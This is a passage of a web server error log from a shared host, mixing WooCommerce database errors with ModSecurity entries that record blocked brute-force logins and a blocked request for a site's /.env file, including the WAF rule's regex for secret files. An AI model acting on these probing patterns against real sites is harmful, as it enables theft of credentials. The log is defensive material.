yfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:38.966229 2026] [security2:error] [pid 817651:tid 817863] [client 45.13.225.123:36252] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "armourin.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWBjtlGRCPPN1dS2y26kQAAANc"]
[Tue May 26 16:48:38.970093 2026] [lsapi:warn] [pid 817651:tid 817878] [client 45.13.225.123:36236] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386318', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:38.970723 2026] [lsapi:warn] [pid 817651:tid 817878] [client 45.13.225.123:36236] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:38.971822 2026] [security2:error] [pid 817651:tid 817878] [client 45.13.225.123:36236] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "armourin.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWBjtlGRCPPN1dS2y26kgAAAOY"]
[Tue May 26 16:48:39.205728 2026] [security2:error] [pid 823496:tid 823665] [client 117.198.37.168:50411] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBj5a08mrtyBNpA4PbOAAAACU"]
[Tue May 26 16:48:39.205843 2026] [security2:error] [pid 823496:tid 823665] [client 117.198.37.168:50411] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBj5a08mrtyBNpA4PbOAAAACU"]
[Tue May 26 16:48:40.363914 2026] [security2:error] [pid 823496:tid 823709] [client 176.65.139.231:32950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "katalystconsulting.svijaykumar.in"] [uri "/.env"] [unique_id "ahWBkJa08mrtyBNpA4PbRQAAAFE"]
[Tue May 26 16:48:40.456356 2026] [security2:error] [pid 823496:tid 823676] [client 62.60.130.233:62932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-login.php"] [unique_id "ahWBkJa08mrtyBNpA4PbRgAAADA"], referer: https://twitter.com/
[Tue May 26 16:48:40.785301 2026] [security2:error] [pid 823496:tid 823639] [client 62.60.130.233:61090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-login.php"] [unique_id "ahWBkJa08mrtyBNpA4PbTQAAAAs"], referer: https://twitter.com/
[Tue May 26 16:48:42.467658 2026] [security2:error] [pid 823496:tid 823671] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBkZa08mrtyBNpA4PbVwAAACs"]
[Tue May 26 16:48:42.853191 2026] [security2:error] [pid 823496:tid 823741] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBkZa08mrtyBNpA4PbXQAAAHE"]
[Tue May 26 16:48:43.625971 2026] [security2:error] [pid 823496:tid 823634] [client 104.28.122.73:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWBk5a08mrtyBNpA4PbdAAAAAY"]
[Tue May 26 16:48:43.681465 2026] [security2:error] [pid 823496:tid 823528] [remote 209.42.20.53:52402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWBk5a08mrtyBNpA4PbeAAAdh0"]
[Tue May 26 16:48:44.312793 2026] [security2:error] [pid 823496:tid 823729] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBkpa08mrtyBNpA4PbawAAAGU"]
[Tue May 26 16:48:44.690837 2026] [security2:error] [pid 817651:tid 817892] [client 40.77.167.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.nicmaperu.com"] [uri "/index.php"] [unique_id "ahWBlNlGRCPPN1dS2y26xgAAAPQ"]
[Tue May 26 16:48:46.472126 2026] [security2:error] [pid 817651:tid 817812] [client 107.189.16.223:57642] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "virgence.com"] [uri "/Search-Replace-DB-master/"] [unique_id "ahWBltlGRCPPN1dS2y26_QAAAKQ"]
[Tue May 26 16:48:46.528323 2026] [core:error] [pid 817651:tid 817872] [client 5.255.99.53:36546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:48:46.528356 2026] [core:error] [pid 817651:tid 817872] [client 5.255.99.53:36546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:48:46.581317 2026] [security2:error] [pid 823496:tid 823651] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBlZa08mrtyBNpA4PbiQAAABc"]
[Tue May 26 16:48:48.195943 2026] [security2:error] [pid 823496:tid 823646] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBl5a08mrtyBNpA4PbpAAAABI"]
[Tue May 26 16:48:48.234102 2026] [lsapi:warn] [pid 823496:tid 823703] [client 45.13.225.123:60322] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386328', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:48.235565 2026] [lsapi:warn] [pid 823496:tid 823703] [client 45.13.225.123:60322] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-